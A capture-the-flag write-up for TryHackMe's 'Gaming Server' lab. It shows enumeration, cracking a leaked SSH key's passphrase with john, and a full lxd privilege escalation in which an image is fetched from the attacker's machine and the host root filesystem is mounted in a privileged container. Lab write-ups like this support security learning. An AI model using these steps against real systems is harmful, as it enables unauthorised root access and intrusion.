Intro
Hey guys! In this write up we will go through Gaming Server room on TryHackMe.
It is an easy room and we have to find the user.txt and the root.txt in order to complete it.
Let’s go!
Enumeration
$ nmap -A -T4 -p- -vv -oN Ascan <Target IP>
$ cat Ascan | grep tcp
22/tcp open ssh syn-ack OpenSSH 7.6p1
80/tcp open http syn-ack Apache httpd 2.4.29
Ok, we have only 2 services:
SSH on port 22
HTTP on port 80
Start gobuster and take a look at the HTTP service:
$ gobuster dir -w /usr/share/wordlists/dirbuster/dirmedium.txt -u <Target IP> -t40
By playing a little bit with the website I can’t find anything useful. But if we look at the homepage source, we can spot a possible username from a comment.
From the gobuster we retrieve some useful resources:
$ gobuster dir -w /usr/share/wordlists/dirbuster/dirmedium.txt -u <Target IP> -t40
/uploads (Status: 301)
/secret (Status: 301)
/server-status (Status: 403)
Let’s take a look at uploads and secret.
Inside upload we have something that looks like a dictionary and we definitely have to grab it, it could be useful. The manifesto and the meme don’t seem to be interesting.
$ wget http://<Target IP>/uploads/dict.lst
Bingo! Inside the secret folder we have a private key, grab it on your attack machine!
$ wget http://<Target IP>/secret/secretKey
Maybe we can log in to the SSH service. In order to use the private key as identification file, we have to change the permission on it:
$ chmod 400 secretKey
$ ssh -i secretKey john@<Target IP>
Unfortunately, we can’t login as we need to input a passphrase. This should not be a problem, maybe we can use john with the dictionary found inside the uploads folder to crack it. Let’s check it.
$ python /usr/share/john/ssh2john.py secretKey > sec.hash
$ john --wordlist=dic sec.hash
Thank you John! Now we can log in! Hello there!
Once inside let’s start check what we have and what we can do..
Inside the john’s home directory there is the user flag.
$ john@exploitable:~$ ls
user.txt
Let’s get the root now.
Privilege Escalation
john@exploitable:~$ id
uid=1000(john) gid=1000(john) groups=1000(john),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
As we can see john is in the lxd group. We can use this to escalate our privileges. To do so I suggest you to read this post from Hacking Articles.
Let’s do it. On our attack machine let’s bring an image to mount and start an HTTP server so we can wget it from the target machine:
$ git clone https://github.com/saghul/lxd-alpine-builder.git
$ cd lxd-alpine-builder
$ ./build-alpine
$ python3 -m http.server
Let’s go back on the target machine:
john@exploitable:~$ cd /tmp
john@exploitable:~$ wget http://<Your IP>/imagefilename.tar.gz
Now add the image, then check if there is:
john@exploitable:~$ lxc image import ./imagefilename.tar.gz --alias myimage
john@exploitable:~$ lxc image list
And it’s there! Awesome.
john@exploitable:~$ lxc init myimage ignite -c security.privileged=true
john@exploitable:~$ lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
john@exploitable:~$ lxc start ignite
john@exploitable:~$ lxc exec ignite /bin/sh
~ # id
uid=0(root) gid=0(root)
~ #
And voilà!
To grab the root.txt we have to go in the mounted path: /mnt/root/root
~ # cd /mnt/root/root
/mnt/root/root # ls
root.txt
Conclusion
Very straightforward easy box. I’ve already find this kind of privesc in another room and I think that all the container universe is very interesting for this purposes.
Hope that someone could find this useful and enjoyable.
Stay safe.